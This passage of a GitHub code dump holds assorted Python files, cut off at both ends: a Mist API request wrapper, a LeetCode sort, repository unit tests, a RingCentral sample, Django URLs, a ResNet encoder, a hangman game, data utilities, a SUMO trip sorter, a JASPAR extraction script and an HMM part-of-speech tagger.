console.debug(\"Request body: \\r\\n%s\" % body)\n if type(body) == str:\n resp = self.session.post(url, data=body, headers=headers)\n elif type(body) == dict:\n resp = self.session.post(url, json=body, headers=headers)\n else: \n resp = self.session.post(url, json=body, headers=headers)\n resp.raise_for_status()\n except HTTPError as http_err:\n 
console.error(f'HTTP error occurred: {http_err}') # Python 3.6\n console.error(f'HTTP error description: {resp.json()}')\n except Exception as err:\n console.error(f'Other error occurred: {err}') # Python 3.6\n else: \n return self._response(resp, uri)\n else:\n console.error(\"you're not authenticated yet...\")\n\n def mist_put(self, uri, org_id=\"\", site_id=\"\", body={}):\n \"\"\"PUT HTTP Request\n Params: uri, HTTP body\n Return: HTTP response\"\"\"\n if self._check_authorization(\"PUT\", org_id=org_id, site_id=site_id):\n try:\n url = self._url(uri)\n console.debug(\"Request > PUT %s\" % url)\n console.debug(\"Request body: \\r\\n%s\" % body)\n if type(body) == str:\n resp = self.session.put(url, data=body)\n elif type(body) == dict:\n resp = self.session.put(url, json=body)\n else: \n resp = self.session.put(url, json=body)\n resp.raise_for_status()\n except HTTPError as http_err:\n console.error(f'HTTP error occurred: {http_err}') # Python 3.6\n console.error(f'HTTP error description: {resp.json()}')\n except Exception as err:\n console.error(f'Other error occurred: {err}') # Python 3.6\n else: \n return self._response(resp, uri)\n\n else:\n console.error(\"you're not authenticated yet...\")\n\n def mist_delete(self, uri, org_id=\"\", site_id=\"\"):\n \"\"\"DELETE HTTP Request\n Params: uri\n Return: HTTP response\"\"\"\n if self._check_authorization(\"DELETE\", org_id=org_id, site_id=site_id):\n try: \n url = self._url(uri)\n console.debug(\"Request > DELETE %s\" % url)\n resp = self.session.delete(url)\n resp.raise_for_status()\n except HTTPError as http_err:\n console.error(f'HTTP error occurred: {http_err}') # Python 3.6\n except Exception as err:\n console.error(f'Other error occurred: {err}') # Python 3.6\n else: \n return self._response(resp, uri)\n else:\n console.error(\"you're not authenticated yet...\")\n\n\n def mist_post_file(self, uri, org_id=\"\", site_id=\"\", files=None):\n \"\"\"POST HTTP Request\n Params: uri, HTTP body\n Return: HTTP response\"\"\"\n if self._check_authorization(\"POST\", org_id=org_id, site_id=site_id):\n try: \n url = self._url(uri)\n console.debug(\"Request > POST %s\" % url)\n resp = self.session.post(url, files=files)\n resp.raise_for_status()\n except HTTPError as http_err:\n console.error(f'HTTP error occurred: {http_err}') # Python 3.6\n console.error(f'HTTP error description: {resp.json()}')\n return resp\n except Exception as err:\n console.error(f'Other error occurred: {err}') # Python 3.6\n else: \n return self._response(resp, uri)\n else:\n console.error(\"you're not authenticated yet...\")\n","repo_name":"cwatson71/Mist-API","sub_path":"mlib/__req.py","file_name":"__req.py","file_ext":"py","file_size_in_byte":8139,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"3974919672","text":"# Definition for singly-linked list.\n# class ListNode:\n# def __init__(self, x):\n# self.val = x\n# self.next = None\n\nclass Solution:\n # @param head, a ListNode\n # @return a ListNode\n def sortList(self, head):\n if not head or not head.next:\n return head\n fast = slow = head\n while fast.next and fast.next.next:\n fast = fast.next.next\n slow = slow.next\n fast = slow.next\n slow.next = None\n left = self.sortList(head)\n right = self.sortList(fast)\n return self.merge(left, right)\n \n def merge(self, l1, l2):\n dummy = ListNode(0)\n if l1 == None: dummy.next = l2\n if l2 == None: dummy.next = l1\n t = dummy\n while l1 != None and l2 != None:\n if l1.val <= l2.val:\n t.next = l1\n l1 = 
l1.next\n else:\n t.next = l2\n l2 = l2.next\n t = t.next\n while l1 != None:\n t.next = l1\n t = t.next\n l1 = l1.next\n while l2 != None:\n t.next = l2\n t = t.next\n l2 = l2.next\n return dummy.next\n\n\n","repo_name":"wade123/Leetcode_Java_Python","sub_path":"Leetcode_Python/sort_list.py","file_name":"sort_list.py","file_ext":"py","file_size_in_byte":1203,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"11210793777","text":"import unittest\nfrom freezegun import freeze_time\nfrom utils.helpers import get_time, get_test_memo, get_test_memo_user, get_id, get_test_memo_obj\nfrom utils.database_handler import connect_test_database, disconnect_database\nfrom repositories.memo_repository import memo_repository\nfrom repositories.user_repository import user_repository\n\n\n@freeze_time(get_time())\nclass TestMemoRepository(unittest.TestCase):\n\n def setUp(self):\n connect_test_database()\n self.userrepo = user_repository\n self.user = self.userrepo.update(get_test_memo_user())\n self.user_two = self.userrepo.update(\n get_test_memo_user(\"6072d33e3a3c627a49901cd7\", \"memouser2\"))\n self.memorepo = memo_repository\n self.before = self.memorepo.count()\n self.memo = get_test_memo()\n self.saved_memo = self.memorepo.new(self.memo)\n\n def tearDown(self):\n self.userrepo.remove(self.user)\n self.userrepo.remove(self.user_two)\n disconnect_database()\n\n # count\n def test_count_defaults_to_all_memos(self):\n for i in range(1, 4):\n self.memorepo.new(get_test_memo())\n count = self.memorepo.count()\n memos = self.memorepo.get()\n self.assertEqual(count, len(memos))\n\n def test_count_all_memos_works(self):\n before = self.memorepo.count(\"all\")\n self.memorepo.new(get_test_memo())\n after = self.memorepo.count(\"all\")\n self.assertEqual(after, before + 1)\n\n def test_count_all_with_multiple_added_works(self):\n before = self.memorepo.count()\n for i in range(1, 4):\n memo = get_test_memo(i)\n self.memorepo.new(memo)\n after = self.memorepo.count()\n self.assertEqual(after, before + 3)\n\n def test_count_id_returns_only_one(self):\n result = self.memorepo.count('id', self.saved_memo.id)\n self.assertEqual(result, 1)\n\n def test_count_not_valid_id_returns_zero(self):\n result = self.memorepo.count('id', get_id())\n self.assertEqual(result, 0)\n\n def test_count_author_returns_right_amount(self):\n for i in range(3):\n memo = get_test_memo()\n memo[\"author\"] = self.user_two\n self.memorepo.new(memo)\n result = self.memorepo.count(\"author\", self.user_two)\n self.assertEqual(result, 3)\n\n # new - ok\n def test_new_memo_returns_created_memo(self):\n self.assertIsNotNone(self.saved_memo.id)\n self.assertEqual(self.saved_memo.author, self.memo[\"author\"])\n self.assertEqual(self.saved_memo.title, self.memo[\"title\"])\n self.assertEqual(self.saved_memo.content, self.memo[\"content\"])\n self.assertEqual(self.saved_memo.date, self.memo[\"date\"])\n\n def test_new_memo_increases_amount_of_memos(self):\n after = self.memorepo.count()\n self.assertEqual(after, self.before+1)\n\n # update\n def test_update_memo_updates_values(self):\n self.saved_memo.title = \"Updated title\"\n self.saved_memo.content = \"Updated content\"\n updated_memo = self.memorepo.update(self.saved_memo)\n self.assertEqual(self.saved_memo.title, updated_memo.title)\n self.assertEqual(self.saved_memo.content, updated_memo.content)\n self.assertEqual(self.saved_memo.author, updated_memo.author)\n\n def test_update_memo_updates_values_to_db(self):\n 
self.saved_memo.title = \"Updated title\"\n        self.saved_memo.content = \"Updated content\"\n        updated_memo = self.memorepo.update(self.saved_memo)\n        memo_in_db = self.memorepo.get('id', self.saved_memo.id)\n        self.assertEqual(memo_in_db, updated_memo)\n\n    # remove\n    def test_remove_memo_removes_from_database(self):\n        result = self.memorepo.remove(self.saved_memo)\n        self.assertEqual(self.memorepo.count(), self.before)\n        self.assertTrue(result)\n\n    def test_remove_memo_returns_false_if_not_valid_memo(self):\n        not_valid_memo = get_test_memo_obj()\n        result = self.memorepo.remove(not_valid_memo)\n        self.assertFalse(result)\n\n    def test_remove_memo_with_none_memo_returns_false(self):\n        result = self.memorepo.remove(None)\n        self.assertFalse(result)\n\n    # get\n    def test_get_defaults_get_all(self):\n        for i in range(1, 4):\n            self.memorepo.new(get_test_memo(i))\n        count = self.memorepo.count()\n        memos = self.memorepo.get()\n        self.assertEqual(len(memos), count)\n\n    def test_get_all_returns_list_of_memos(self):\n        added_memos = []\n        added_memos.append(self.saved_memo)\n        for i in range(1, 4):\n            added_memos.append(self.memorepo.new(get_test_memo(i)))\n        memos = self.memorepo.get(\"all\")\n        for i in range(len(memos)):\n            self.assertEqual(memos[i], added_memos[i])\n\n    def test_get_id_returns_memo_with_same_id(self):\n        queried_memo = self.memorepo.get('id', self.saved_memo.id)\n        self.assertEqual(queried_memo, self.saved_memo)\n        self.assertEqual(queried_memo.id, self.saved_memo.id)\n        self.assertEqual(queried_memo.title, self.saved_memo.title)\n        self.assertEqual(queried_memo.content, self.saved_memo.content)\n\n    def test_get_unvalid_id(self):\n        queried_memo = self.memorepo.get('id', get_id())\n        self.assertIsNone(queried_memo)\n\n    def test_get_author_id_with_author_works(self):\n        user_two_memo = get_test_memo()\n        user_two_memo[\"author\"] = self.user_two\n        self.memorepo.new(user_two_memo)\n        queried_memos = self.memorepo.get(\n            \"author\", self.saved_memo.author)\n        self.assertEqual(len(queried_memos), 1)\n        queried_memo = queried_memos[0]\n        self.assertEqual(queried_memo.id, self.saved_memo.id)\n        self.assertEqual(queried_memo.author, self.saved_memo.author)\n","repo_name":"FinThunderstorm/ohte","sub_path":"src/tests/repositories/test_memorepository.py","file_name":"test_memorepository.py","file_ext":"py","file_size_in_byte":5784,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} {"seq_id":"72539776106","text":"#!/usr/bin/python\n\n# You get the environment parameters from your \n# application dashboard in your developer account \n# https://developers.ringcentral.com\n\nimport os\nimport sys\n \nfrom dotenv import load_dotenv\nfrom ringcentral import SDK\nload_dotenv()\n\nrcsdk = SDK( os.environ.get('RC_CLIENT_ID'),\n             os.environ.get('RC_CLIENT_SECRET'),\n             os.environ.get('RC_SERVER_URL') )\nplatform = rcsdk.platform()\ntry:\n    platform.login( jwt=os.environ.get('RC_JWT') )\nexcept Exception as e:\n    sys.exit(\"Unable to authenticate to platform: \" + str(e))\n\ntry:\n    resp = platform.get('/restapi/v1.0/account/~/call-queues')\n    records = resp.json().records\n    if len(records) == 0:\n        print( f'No call queues were found for the current account' )\n    else:\n        for r in records:\n            print( f'Call queue: name = {r[\"name\"]}, extension = {r[\"extension\"]}' )\n\nexcept Exception as e:  # the original referenced an undefined ApiException; catch the base Exception\n    sys.exit( e )\nelse:\n    sys.exit( 0 
)\n","repo_name":"ringcentral/ringcentral-api-docs","sub_path":"code-samples/voice/call-queues-read-call-queues.py","file_name":"call-queues-read-call-queues.py","file_ext":"py","file_size_in_byte":947,"program_lang":"python","lang":"en","doc_type":"code","stars":32,"dataset":"github-code","pt":"37"} +{"seq_id":"10497604931","text":"from django.urls import path\n\nfrom .views import (ArticlesListCreateAPIView, LikeArticlesView, ReportArticlesView,\n GetArticleBySlugApiView, RetrieveUpdateArticleByIdApiView,\n RateCreateAPIView, RateRetrieveAPIView,\n )\n\nfrom .share_articles import (\n ShareArticleViaEmailAPIView,\n ShareArticleViaFacebookAPIView,\n ShareArticleViaTwitterAPIView,\n)\n\n\nlist_create_articles = path(\n '', ArticlesListCreateAPIView.as_view(), name='list_create_articles')\nget_article_byId = path(\n '', RetrieveUpdateArticleByIdApiView.as_view(), name='get_article_byId')\nget_article_bySlug = path(\n '', GetArticleBySlugApiView.as_view(), name='get_article_bySlug')\nadd_article_ratings = path(\n 'add_rates/', RateCreateAPIView.as_view(), name='add_article_ratings')\nview_average_article_ratings = path(\n 'view_rates/', RateRetrieveAPIView.as_view(), name='view_average_article_ratings')\nview_article_like_status = path(\n '/like_status', LikeArticlesView.as_view(), name='view_article_like_status')\nshare_article_via_email = path(\n '/email', ShareArticleViaEmailAPIView.as_view(), name='share_article_via_email')\nshare_article_via_facebook = path(\n '/facebook', ShareArticleViaFacebookAPIView.as_view(), name='share_article_via_facebook')\nshare_article_via_twitter = path(\n '/twitter', ShareArticleViaTwitterAPIView.as_view(), name='share_article_via_twitter')\nreport_article_view = path(\n '/report_status', ReportArticlesView.as_view(), name='report_article_view')\n\nurlpatterns = [\n list_create_articles,\n get_article_byId,\n get_article_bySlug,\n add_article_ratings,\n view_average_article_ratings,\n view_article_like_status,\n share_article_via_email,\n share_article_via_facebook,\n share_article_via_twitter,\n report_article_view,\n \n]\n","repo_name":"andela/ah-backend-thor","sub_path":"authors/apps/articles/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1905,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"11351354279","text":"import torch.nn as nn\nimport torchvision.models as models\nimport torch\n\n#####################\n# Encoder RESNET CNN\n#####################\nclass Encoder(nn.Module):\n def __init__(self):\n super(Encoder, self).__init__()\n resnet = models.resnet101(pretrained=True)\n self.resnet = nn.Sequential(*list(resnet.children())[:-2])\n self.adaptive_pool = nn.AdaptiveAvgPool2d((14, 14))\n\n def forward(self, images):\n out = self.adaptive_pool(self.resnet(images))\n # batch_size, img size, imgs size, 2048\n out = out.permute(0, 2, 3, 1)\n return out","repo_name":"quanglegl1404/Image-Captioning","sub_path":"encoder.py","file_name":"encoder.py","file_ext":"py","file_size_in_byte":595,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"3950518683","text":"#!/usr/bin/python3\n# Juego del ahorcado\n# by @M4lal0\n# -*- coding: utf-8 -*-\n\nimport random\nimport subprocess,sys\nimport platform\nimport time\nimport base64\n\nclass bcolors:\n PURPLE = '\\033[95m'\n BLUE = '\\033[94m'\n YELLOW = '\\033[93m'\n GREEN = '\\033[92m'\n RED = '\\033[91m'\n DARKCYAN = '\\033[36m'\n UNDERLINE = '\\033[4m'\n BOLD = '\\033[1m'\n 
ENDC = '\\033[0m'\n\n\nIMAGES = ['''\n +---+\n | |\n |\n |\n |\n |\n =========''', '''\n +---+\n | |\n O |\n |\n |\n |\n =========''', '''\n +---+\n | |\n O |\n | |\n |\n |\n =========''', '''\n +---+\n | |\n O |\n /| |\n |\n |\n =========''', '''\n +---+\n | |\n O |\n /|\\ |\n |\n |\n =========''', '''\n +---+\n | |\n O |\n /|\\ |\n | |\n |\n =========''', '''\n +---+\n | |\n O |\n /|\\ |\n | |\n / |\n =========''', '''\n +---+\n | |\n O |\n /|\\ |\n | |\n / \\ |\n =========''', '''\n''']\n\nWORDS_EASY = ('cGVsaWN1bGE=','b2JsaWdhY2lvbg==','ZXN0YWRvcw==','ZnVlZ28=','Y2FyYQ==','c29mYQ==','Y2FtaXNh','YWR1bHRv','YWlyZQ==','bWVzYQ==','cGFu','dm9sY2Fu')\nWORDS_MEDIUM = ('bWljcm9zb2Z0','ZmFjZWJvb2s=','dGVzbGE=','dHdpdHRlcg==','YW1hem9u','dGVsZWZvbmljYQ==','YXZpb25ldGE=','ZGVtb2NyYWNpYQ==','Y29tcHV0YWRvcmE=','Z29iaWVybm8=')\nWORDS_HARD = ('YW50aWNvbnN0aXR1Y2lvbmFsbWVudGU=','cGFyYW5nYXJpY3V0aXJpbWljdWFybw==','b3RvcnJpbm9sYXJpbmdvbG9naWE=','aW5zdGl0dWNpb25hbGl6YWNpb24=','ZXN0ZXJub2NsZWlkb21hc3RvaWRlbw==','ZWxlY3Ryb2VuY2VmYWxvZ3JhbWE=')\n\n\ndef random_word(option):\n if option == \"1\":\n idx = random.randint(0, len(WORDS_EASY) - 1)\n return decodeBase64(WORDS_EASY[idx])\n elif option == \"2\":\n idx = random.randint(0, len(WORDS_MEDIUM) - 1)\n return decodeBase64(WORDS_MEDIUM[idx])\n elif option == \"3\":\n idx = random.randint(0, len(WORDS_HARD) - 1)\n return decodeBase64(WORDS_HARD[idx])\n else:\n return None\n\n\ndef decodeBase64(theword):\n base64_message = theword\n base64_bytes = base64_message.encode('ascii')\n message_bytes = base64.b64decode(base64_bytes)\n message = message_bytes.decode('ascii')\n return message\n\n\ndef display_board(hidden_word, tries):\n print(IMAGES[tries])\n print('')\n print(hidden_word)\n print('--- * --- * --- * --- * --- * --- ')\n\n\ndef Clear():\n subprocess.Popen( \"cls\" if platform.system() == \"Windows\" else \"clear\", shell=True)\n time.sleep(0.1)\n\n\ndef display_banner():\n banner = \"\\n ╔═══╗╔╗ ╔╗ \\n\"\n banner += \" ║╔═╗║║║ ║║ \\n\"\n banner += \" ║║ ║║║╚═╗╔══╗╔═╗╔══╗╔══╗ ╔═╝║╔══╗\\n\"\n banner += \" ║╚═╝║║╔╗║║╔╗║║╔╝║╔═╝╚ ╗║ ║╔╗║║╔╗║\\n\"\n banner += \" ║╔═╗║║║║║║╚╝║║║ ║╚═╗║╚╝╚╗║╚╝║║╚╝║\\n\"\n banner += \" ╚╝ ╚╝╚╝╚╝╚══╝╚╝ ╚══╝╚═══╝╚══╝╚══╝\\n\"\n banner += \"--[ Juego del ahorcado | v20.02 ]--\"\n return print(bcolors.DARKCYAN + banner + bcolors.ENDC)\n\n\ndef main():\n display_banner()\n print(\"\"\"\\nDifficulty:\n [1] - Easy\n [2] - Medium\n [3] - Hard\"\"\")\n option = input(\"Select an option [1-3]: \")\n if option == \"1\" or option == \"2\" or option == \"3\":\n Clear()\n word = random_word(option)\n hidden_word = ['-'] * len(word)\n tries = 0\n\n while True:\n Clear()\n display_banner()\n display_board(hidden_word, tries)\n current_letter = str(input('Type a letter: '))\n\n letter_indexes = []\n for idx in range(len(word)):\n if word[idx] == current_letter:\n letter_indexes.append(idx)\n\n if len(letter_indexes) == 0:\n tries += 1\n\n if tries == 7:\n Clear()\n display_banner()\n display_board(hidden_word, tries)\n print(bcolors.RED + \"\\n¡Game over! You lost. The correct word was: {0}\".format(word) + bcolors.ENDC)\n break\n else:\n for idx in letter_indexes:\n hidden_word[idx] = current_letter\n\n letter_indexes = []\n\n try:\n hidden_word.index('-')\n except ValueError:\n Clear()\n display_banner()\n display_board(hidden_word, tries)\n print(bcolors.GREEN + \"\\n¡Congratulation! You win. 
The word is: {0}\".format(word) + bcolors.ENDC)\n break\n else:\n print(\"Option invalid!\")\n time.sleep(1)\n sys.exit(1)\n\n\nif __name__ == '__main__':\n main()","repo_name":"m4lal0/Ahorcado_Game","sub_path":"ahorcados.py","file_name":"ahorcados.py","file_ext":"py","file_size_in_byte":4939,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"70858348588","text":"# Data related utility functions.\nimport pandas as pd\nimport os\n\n\n# Reads data from .env file\ndef load_dotenv():\n \"\"\"\n Reads data from .env file\n\n Returns:\n - dict: A dictionary containing the data from the .env file.\n \"\"\"\n dotenv_path = os.path.join(os.getcwd(), \".env\")\n dotenv_dict = {}\n\n with open(dotenv_path, \"r\") as dotenv_file:\n for line in dotenv_file:\n line = line.strip()\n\n if line.startswith(\"#\") or not line:\n continue\n\n key, value = line.split(\"=\", 1)\n dotenv_dict[key] = value\n\n return dotenv_dict\n\n\n# Read a data file into a pandas DataFrame based on its extension.\ndef read_data_file(file_path, **kwargs):\n \"\"\"\n Read a data file into a pandas DataFrame based on its extension.\n\n Parameters:\n - file_path (str): Path to the data file.\n\n Returns:\n - DataFrame: The data loaded into a pandas DataFrame.\n \"\"\"\n\n extension_read_function_mapping = {\n \".csv\": pd.read_csv,\n \".xlsx\": pd.read_excel,\n \".xls\": pd.read_excel,\n \".tsv\": lambda x, **y: pd.read_csv(x, delimiter=\"\\t\", **y),\n \".json\": pd.read_json,\n \".parquet\": pd.read_parquet,\n \".feather\": pd.read_feather,\n \".dta\": pd.read_stata,\n \".pkl\": pd.read_pickle,\n \".sas7bdat\": pd.read_sas,\n }\n\n _, file_extension = os.path.splitext(file_path)\n\n read_function = extension_read_function_mapping.get(file_extension)\n\n if read_function is None:\n raise ValueError(f\"Unsupported file extension: {file_extension}.\")\n\n return read_function(file_path, **kwargs)\n","repo_name":"mijki/zengrid-analysis","sub_path":"utils/data_utils.py","file_name":"data_utils.py","file_ext":"py","file_size_in_byte":1624,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"35026458699","text":"import xml.etree.ElementTree as ET\r\n\r\n# Function to arrange vehicle trips in ascending order of depart time\r\ndef arrange_trips_by_depart_time(input_file, output_file):\r\n tree = ET.parse(input_file)\r\n root = tree.getroot()\r\n\r\n # Get all trip elements and sort them by depart time\r\n trips = root.findall(\".//trip\")\r\n sorted_trips = sorted(trips, key=lambda x: float(x.attrib[\"depart\"]))\r\n\r\n # Create a new root element and add the sorted trips to it\r\n sorted_root = ET.Element(root.tag, root.attrib)\r\n for trip in sorted_trips:\r\n sorted_root.append(trip)\r\n\r\n # Write the sorted trips to the output file\r\n sorted_tree = ET.ElementTree(sorted_root)\r\n sorted_tree.write(output_file)\r\n\r\n# Modify the trips file\r\ninput_file = \"tenbus.xml\"\r\noutput_file = \"tenbus.trips.xml\"\r\narrange_trips_by_depart_time(input_file, output_file)\r\nprint(f\"Sorted trips file generated: {output_file}\")\r\n","repo_name":"Skhem02/Explainable-AI-for-Planning-Vehicular-Traffic-Infrastructure-7sem","sub_path":"XAI-7sem/sorttrips.py","file_name":"sorttrips.py","file_ext":"py","file_size_in_byte":916,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"2347144182","text":"import os\nimport pandas as pd\n\ndf = 
pd.read_csv(\"PATH/TO/YOUR/BED_FILE.bed\", header=0, sep=\"\\t\")\n\nfor i, row in df.iterrows():\n # This command is for Linux OS\n command = './bigBedToBed http://hgdownload.soe.ucsc.edu/gbdb/hg38/jaspar/JASPAR2022.bb OUTPUT_FOLDER/JASPAR__%s.bed -chrom=%s -start=%s -end=%s' % (row['id'], row['chr'], row['start'], row['end'])\n print(command)\n os.system(command)\n\nprint(\"Completed !\")","repo_name":"UdithaM/jaspar-transcription-factors-extraction","sub_path":"jaspar_extractor.py","file_name":"jaspar_extractor.py","file_ext":"py","file_size_in_byte":426,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"25786905782","text":"import numpy as np\n\n\nclass Solver:\n # Calculate the log of the posterior probability of a given sentence\n def __init__(self):\n self.transition_dict = {}\n self.tag_to_word_dict = {}\n self.tag_dict={}\n self.word_dict={}\n self.initial_prob_tag_dict = {}\n self.transition_2_dict = {}\n \n def posterior(self, model, sentences, labels):\n if model == \"Simple\": \n log_prob = 0\n for word , tag in zip(sentences, labels):\n #P(W=word|S=tag)\n if word not in self.tag_to_word_dict[tag].keys():\n prob_w_t = 0.0000001\n else:\n prob_w_t = self.tag_to_word_dict[tag][word]\\\n /self.tag_to_word_dict[tag]['word_count_with_tag']\n #P(S=tag|W=word) = P(W=word|S=tag)P(S=tag)/P(all words)\n #the denominator is constssant and thus only numeration is significant.\n prob_t_w = prob_w_t * (self.tag_dict[tag]/sum(self.tag_dict.values()))\n log_prob += np.log(prob_t_w)\n return log_prob\n#\n elif model == \"Complex\":\n log_prob = 0\n for i in range(len(sentences)):\n #P(W=word|S=tag)\n prob_w_t = self.tag_to_word_dict.get(labels[i]).get(sentences[i],0.0000001)\n if prob_w_t != 0.0000001:\n prob_w_t = prob_w_t/self.tag_to_word_dict.get(labels[i]).get('word_count_with_tag')\n #P(S=tag|W=word) = P(W=word|S=tag)P(S=tag)/P(all words)\n #the denominator is constant and thus only numeration is significant.\n prob_t_w = prob_w_t * (self.tag_dict[labels[i]]/sum(self.tag_dict.values()))\n if i == 0:\n prob_s = self.tag_dict[labels[i]]/sum(self.tag_dict.values())\n log_prob += np.log(prob_s)\n elif i == 1:\n prob_s_s1 = self.transition_dict.get(labels[i-1]).get(labels[i],0.0000001)\n if prob_s_s1 != 0.0000001:\n prob_s_s1 = prob_s_s1/self.transition_dict.get(labels[i-1]).get('transition_count')\n log_prob += np.log(prob_s_s1)\n else:\n prob_s_s2 = self.transition_2_dict.get(labels[i-2]).get(labels[i-1],0.0000001)\n if prob_s_s2 != 0.0000001:\n prob_s_s2 = self.transition_2_dict.get(labels[i-2]).get(labels[i-1]).get(labels[i],0.0000001)\n if prob_s_s2 != 0.0000001:\n prob_s_s2 = prob_s_s2/self.transition_2_dict.get(labels[i-2]).get(labels[i-1]).get('transition_count')\n log_prob += np.log(prob_s_s2)\n log_prob += np.log(prob_w_t)\n return log_prob\n \n elif model == \"HMM\":\n log_prob = 0\n for i in range(len(sentences)):\n if i == 0:\n prob_s0 = self.initial_prob_tag_dict.get(labels[i])\\\n /sum(self.initial_prob_tag_dict.values())\n log_prob = np.log(prob_s0)\n #P(W=word|S=tag)\n prob_w_t = self.tag_to_word_dict.get(labels[i]).get(sentences[i],0.0000001)\n if prob_w_t != 0.0000001:\n prob_w_t = prob_w_t/self.tag_to_word_dict.get(labels[i]).get('word_count_with_tag')\n #P(S=tag|W=word) = P(W=word|S=tag)P(S=tag)/P(all words)\n #the denominator is constant and thus only numeration is significant.\n prob_t_w = prob_w_t * (self.tag_dict[labels[i]]/sum(self.tag_dict.values()))\n prob_s_s1 = 1\n if i>=1:\n if 
self.transition_dict[labels[i-1]].get(labels[i]) != None:\n prob_s_s1 = self.transition_dict[labels[i-1]][labels[i]]\\\n /self.transition_dict[labels[i-1]]['transition_count']\n else:\n prob_s_s1 = 0.0000001\n log_prob += np.log(prob_s_s1)+np.log(prob_w_t)\n return log_prob\n \n else:\n print(\"Unknown algo!\")\n\n # Do the training!\n #%%\n def train(self, data):\n pos_tags = [x[1] for x in data]\n words = [x[0] for x in data]\n #creating transition dictionary to find P(Si+1|Si)\n for sentence in pos_tags:\n for i in range(len(sentence)-1):\n if sentence[i] not in self.transition_dict.keys():\n self.transition_dict[sentence[i]] = {'transition_count':0}\n if sentence[i+1] not in self.transition_dict[sentence[i]].keys():\n self.transition_dict[sentence[i]][sentence[i+1]] = 1\n else:\n self.transition_dict[sentence[i]][sentence[i+1]] += 1\n self.transition_dict[sentence[i]]['transition_count'] += 1\n \n #creating a two level transition dictionary for P(Si+1|Si,Si-1)\n for sentence in pos_tags:\n for i in range (len(sentence)-2):\n if sentence[i] not in self.transition_2_dict.keys():\n self.transition_2_dict[sentence[i]] = {}\n if sentence[i+1] not in self.transition_2_dict[sentence[i]].keys():\n self.transition_2_dict[sentence[i]][sentence[i+1]] = {'transition_count':0}\n if sentence[i+2] not in\\\n self.transition_2_dict[sentence[i]][sentence[i+1]].keys():\n self.transition_2_dict[sentence[i]][sentence[i+1]][sentence[i+2]] = 1\n else:\n self.transition_2_dict[sentence[i]][sentence[i+1]][sentence[i+2]] += 1\n self.transition_2_dict[sentence[i]][sentence[i+1]]['transition_count'] += 1 \n \n #finding tags that start a sentence\n initial_tags = [i[0] for i in pos_tags]\n \n #creating dictionary for initial tags for P(S0=Si)\n for tag in initial_tags:\n if tag not in self.initial_prob_tag_dict.keys():\n self.initial_prob_tag_dict[tag] = 1\n else:\n self.initial_prob_tag_dict[tag] += 1\n \n #creating tags dictionary for P(S=Si)\n for sentence in pos_tags:\n for tag in sentence:\n if tag not in self.tag_dict.keys():\n self.tag_dict[tag] = 1\n else:\n self.tag_dict[tag] += 1\n \n #creating words dictionary for P(W=Wi)\n for sentence in words:\n for word in sentence:\n if word not in self.word_dict.keys():\n self.word_dict[word] = 1\n else:\n self.word_dict[word] += 1 \n \n #creating flattened list of tags and words \n tags = [tag for sentence in pos_tags for tag in sentence]\n words = [word for sentence in words for word in sentence]\n \n word_data = []\n for i, j in zip(words,tags):\n word_data.append((i,j))\n \n tags = set(tags)\n \n #creating dictionary that stores tag wise list of words for P(W|S)\n for i in tags:\n temp_word_list = [word[0] for word in word_data if word[1] == i]\n if i not in self.tag_to_word_dict.keys():\n self.tag_to_word_dict[i] = {'word_count_with_tag':0}\n for word in temp_word_list:\n if word not in self.tag_to_word_dict[i].keys():\n self.tag_to_word_dict[i][word] = 1\n else:\n self.tag_to_word_dict[i][word] += 1\n self.tag_to_word_dict[i]['word_count_with_tag'] += 1\n \n#%%\n # Functions for each algorithm. 
Right now this just returns nouns -- fix this!\n #\n def simplified(self, sentence):\n \n tag_prob = {}\n total_tags = sum(self.tag_dict.values())\n for key in self.tag_dict:\n tag_prob[key] = self.tag_dict[key]/total_tags\n \n word_prob = {}\n total_words = sum(self.word_dict.values())\n for key in self.word_dict:\n word_prob[key] = self.word_dict[key]/total_words\n \n max_prob_list = []\n for w in sentence:\n max_prob = -99999\n max_s = ''\n if w not in self.word_dict.keys():\n max_s = 'noun'\n max_prob = 1\n else:\n for s in self.tag_dict:\n if w not in self.tag_to_word_dict[s].keys():\n prob_s_w = 0\n else: \n prob_s_w = (self.tag_to_word_dict[s][w]/self.tag_to_word_dict[s]['word_count_with_tag'])\\\n *(tag_prob[s]/word_prob[w])\n if(max_prob <= prob_s_w):\n max_prob = prob_s_w\n max_s = s \n max_prob_list.append(max_s)\n return max_prob_list\n\n def hmm_viterbi(self, sentence):\n viterbi_list = []\n \n for it in range(len(sentence)):\n tag_prob_dict = {'.':{},'adj':{},'adp':{},'adv':{},'conj':{},'det':{},'noun':{},'num':{},\\\n 'pron':{},'prt':{},'verb':{},'x':{}}\n for curr_tag in tag_prob_dict:\n # calculating P(W=sentence[it]|S=tag)\n if sentence[it] not in self.tag_to_word_dict[curr_tag].keys():\n prob_w_s = 0.000000001\n else:\n prob_w_s = self.tag_to_word_dict[curr_tag][sentence[it]]\\\n /self.tag_to_word_dict[curr_tag]['word_count_with_tag']\n \n #if a word in testing dataset is not present in training dataset, it is\n #more likely to be a noun. So I assign a probability of 1 for noun \n #and 0 for all other tags.\n if sentence[it] not in self.word_dict.keys():\n #if the new noun is in between the sentence, then use the previous entry\n #in viterbi list to keep track of the prev_tag. Else its the first word\n #in the sentence so no need to keep track of prev_tag.\n if len(viterbi_list)>0:\n prev_tag = max(viterbi_list[-1],key=lambda x:viterbi_list[-1][x]['prob'])\n tag_prob_dict = {'.':{'prob':0},\\\n 'adj':{'prob':0},\\\n 'adp':{'prob':0},\\\n 'adv':{'prob':0},\\\n 'conj':{'prob':0},\\\n 'det':{'prob':0},\\\n 'noun':{'prob':1,'prev_tag':prev_tag},\\\n 'num':{'prob':0},\\\n 